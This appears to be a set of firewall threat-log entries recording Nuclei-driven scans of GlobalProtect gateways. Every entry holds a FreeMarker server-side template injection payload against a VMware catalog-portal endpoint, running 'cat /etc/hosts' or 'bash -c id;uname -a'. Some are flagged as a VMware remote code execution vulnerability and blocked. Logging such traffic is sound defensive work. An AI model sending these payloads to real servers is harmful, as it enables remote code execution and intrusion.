May 19 01:48:43 sjc1-03.examplecorp.com 1,2022/05/19 01:48:43,013201017254,THREAT,url,2561,2022/05/19 01:48:43,7.19.10.12,1.23.1.2,7.1.10.10,1.23.1.2,service-globalprotect-linux,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.6,example_Zero,2022/05/19 01:48:43,1931941,1,40380,443,40380,20077,0x1403000,tcp,allow,"us-west-split.example.com/catalog-portal/ui/oauth/verify?error=&deviceUdid=${""freemarker.template.utility.Execute""?new()(""cat%20/etc/hosts"")}",(9999),allow-URL,informational,client-to-server,7097624080174009847,0x8000000000000000,Germany,United States,,,0,,,1,Nuclei - Open-source project (github.com/projectdiscovery/nuclei),,,,,,,0,177,204,178,207,,sjc1-fw-03,,,,get,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,," allow-URL,computer-and-internet-info,low-risk",4f3aada9-5cc1-44c6-a2ea-10f1fdf12488,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2022-05-19T01:48:43.602+00:00,,,,internet-utility,general-internet,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,web-browsing,no,no
May 19 01:48:28 sjc1-03.examplecorp.com 1,2022/05/19 01:48:28,013201017254,THREAT,url,2561,2022/05/19 01:48:28,7.1.10.10,1.23.1.2,7.1.10.10,1.23.1.2,service-globalprotect-linux,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.6,example_Zero,2022/05/19 01:48:28,1932214,1,46652,80,46652,28869,0x403000,tcp,allow,"us-west-split.example.com/catalog-portal/ui/oauth/verify?error=&deviceUdid=${""freemarker.template.utility.Execute""?new()(""cat%20/etc/hosts"")}",(9999),allow-URL,informational,client-to-server,7097624080174009825,0x8000000000000000,Germany,United States,,,0,,,1,Nuclei - Open-source project (github.com/projectdiscovery/nuclei),,,,,,,0,177,204,178,207,,sjc1-fw-03,,,,get,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,," allow-URL,computer-and-internet-info,low-risk",4f3aada9-5cc1-44c6-a2ea-10f1fdf12488,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2022-05-19T01:48:28.598+00:00,,,,internet-utility,general-internet,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,web-browsing,no,no
May 18 16:45:12 hkg1-01.examplecorp.com 1,2022/05/18 16:45:12,016201005228,THREAT,vulnerability,2305,2022/05/18 16:45:12,14.13.14.2,2.4.6.5,14.13.14.2,2.4.6.5,Untrust-to-GlobalProtect-GW,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.1,example_Zero,2022/05/18 16:45:12,897103,1,56650,80,56650,28869,0x402000,tcp,reset-both,"gw1.example.com/catalog-portal/ui/oauth/verify?error=&deviceUdid=${""freemarker.template.utility.Execute""?new()(""cat%20/etc/hosts"")}",VMware Server-Side Template Injection Remote Code Execution Vulnerability(92483),allow-URL,critical,client-to-server,43511804,0xa000000000000000,Germany,Hong Kong,0,,0,,,1,,,,,,,,0,177,204,178,425,,hkg1-fw-01,,,,,0,,0,,N/A,code-execution,AppThreat-8570-7393,0x0,0,4294967295,,,c724abbc-9614-4974-80c2-8a01ef4a2954,0,
May 18 16:45:07 hkg1-01.examplecorp.com 1,2022/05/18 16:45:07,016201005228,THREAT,url,2305,2022/05/18 16:45:07,14.13.14.2,2.4.6.5,14.13.14.2,2.4.6.5,Untrust-to-GlobalProtect-GW,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.1,example_Zero,2022/05/18 16:45:07,897103,1,56650,80,56650,28869,0x403000,tcp,allow,"gw1.example.com/catalog-portal/ui/oauth/verify?error=&deviceUdid=${""freemarker.template.utility.Execute""?new()(""cat%20/etc/hosts"")}",(9999),allow-URL,informational,client-to-server,43511792,0xa000000000000000,Germany,Hong Kong,0,,0,,,1,Nuclei - Open-source project (github.com/projectdiscovery/nuclei),,,,,,,0,177,204,178,425,,hkg1-fw-01,,,,get,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,," allow-URL,computer-and-internet-info,low-risk",c724abbc-9614-4974-80c2-8a01ef4a2954,0,
May 18 16:45:05 hkg1-01.examplecorp.com 1,2022/05/18 16:45:05,016201005228,THREAT,vulnerability,2305,2022/05/18 16:45:05,14.13.14.2,2.4.6.5,14.13.14.2,2.4.6.5,Untrust-to-GlobalProtect-GW,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.1,example_Zero,2022/05/18 16:45:05,897820,2,41718,80,41718,28869,0x402000,tcp,reset-both,"gw1.example.com/catalog-portal/ui/oauth/verify?error=&deviceUdid=${""freemarker.template.utility.Execute""?new()(""cat%20/etc/hosts"")}",VMware Server-Side Template Injection Remote Code Execution Vulnerability(92483),allow-URL,critical,client-to-server,43511791,0xa000000000000000,Germany,Hong Kong,0,,0,,,1,,,,,,,,0,177,204,178,425,,hkg1-fw-01,,,,,0,,0,,N/A,code-execution,AppThreat-8570-7393,0x0,0,4294967295,,,c724abbc-9614-4974-80c2-8a01ef4a2954,0,
May 18 16:42:12 hkg1-01.examplecorp.com 1,2022/05/18 16:42:12,016201005228,THREAT,vulnerability,2305,2022/05/18 16:42:12,14.13.14.2,2.4.6.5,14.13.14.2,2.4.6.5,Untrust-to-GlobalProtect-GW,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.1,example_Zero,2022/05/18 16:42:12,897103,1,56650,80,56650,28869,0x402000,tcp,reset-both,"gw1.example.com/catalog-portal/ui/oauth/verify?error=&deviceUdid=${""freemarker.template.utility.ObjectConstructor""?new()(""java.lang.ProcessBuilder"",""bash"",""-c"",""id;uname -a"").start()}",VMware Server-Side Template Injection Remote Code Execution Vulnerability(92483),allow-URL,critical,client-to-server,43511804,0xa000000000000000,Germany,Hong Kong,0,,0,,,1,,,,,,,,0,177,204,178,425,,hkg1-fw-01,,,,,0,,0,,N/A,code-execution,AppThreat-8570-7393,0x0,0,4294967295,,,c724abbc-9614-4974-80c2-8a01ef4a2954,0,
May 18 16:42:07 hkg1-01.examplecorp.com 1,2022/05/18 16:42:07,016201005228,THREAT,url,2305,2022/05/18 16:42:07,14.13.14.2,2.4.6.5,14.13.14.2,2.4.6.5,Untrust-to-GlobalProtect-GW,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.1,example_Zero,2022/05/18 16:42:07,897103,1,56650,80,56650,28869,0x403000,tcp,allow,"gw1.example.com/catalog-portal/ui/oauth/verify?error=&deviceUdid=${""freemarker.template.utility.ObjectConstructor""?new()(""java.lang.ProcessBuilder"",""bash"",""-c"",""id;uname -a"").start()}",(9999),allow-URL,informational,client-to-server,43511792,0xa000000000000000,Germany,Hong Kong,0,,0,,,1,Nuclei - Open-source project (github.com/projectdiscovery/nuclei),,,,,,,0,177,204,178,425,,hkg1-fw-01,,,,get,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,," allow-URL,computer-and-internet-info,low-risk",c724abbc-9614-4974-80c2-8a01ef4a2954,0,
May 18 16:42:05 hkg1-01.examplecorp.com 1,2022/05/18 16:42:05,016201005228,THREAT,vulnerability,2305,2022/05/18 16:42:05,14.13.14.2,2.4.6.5,14.13.14.2,2.4.6.5,Untrust-to-GlobalProtect-GW,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.1,example_Zero,2022/05/18 16:42:05,897820,2,41718,80,41718,28869,0x402000,tcp,reset-both,"gw1.example.com/catalog-portal/ui/oauth/verify?error=&deviceUdid=${""freemarker.template.utility.ObjectConstructor""?new()(""java.lang.ProcessBuilder"",""bash"",""-c"",""id;uname -a"").start()}",VMware Server-Side Template Injection Remote Code Execution Vulnerability(92483),allow-URL,critical,client-to-server,43511791,0xa000000000000000,Germany,Hong Kong,0,,0,,,1,,,,,,,,0,177,204,178,425,,hkg1-fw-01,,,,,0,,0,,N/A,code-execution,AppThreat-8570-7393,0x0,0,4294967295,,,c724abbc-9614-4974-80c2-8a01ef4a2954,0,